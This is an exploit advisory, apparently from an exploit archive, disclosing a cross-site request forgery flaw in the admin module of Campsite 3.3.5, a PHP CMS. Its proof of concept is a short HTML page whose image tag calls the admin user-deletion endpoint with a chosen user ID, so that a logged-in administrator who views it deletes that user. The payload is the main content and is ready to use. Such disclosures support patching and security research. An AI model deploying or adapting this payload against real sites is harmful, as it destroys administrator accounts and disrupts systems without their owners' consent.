56 lines
No EOL
1.4 KiB
Text
56 lines
No EOL
1.4 KiB
Text
=======================================================================
|
|
|
|
campsite 3.3.5 CSRF Vulnerability
|
|
|
|
=======================================================================
|
|
|
|
by
|
|
|
|
Pratul Agrawal
|
|
|
|
|
|
|
|
# Vulnerability found in- Admin module
|
|
|
|
# email Pratulag@yahoo.com
|
|
|
|
# company aksitservices
|
|
|
|
# Credit by Pratul Agrawal
|
|
|
|
# Category CMS / Portals
|
|
|
|
# Site p4ge http://wwwcampware.org/
|
|
|
|
# Plateform php
|
|
|
|
|
|
|
|
# Proof of concept #
|
|
|
|
Targeted URL: http://server/admin/login.php
|
|
|
|
|
|
Script to delete the Admin user through Cross Site request forgery
|
|
|
|
. ..................................................................................................................
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
. ..................................................................................................................
|
|
|
|
|
|
|
|
After execution refresh the page and u can see that user having giving ID get deleted automatically.
|
|
|
|
|
|
#If you have any questions, comments, or concerns, feel free to contact me. |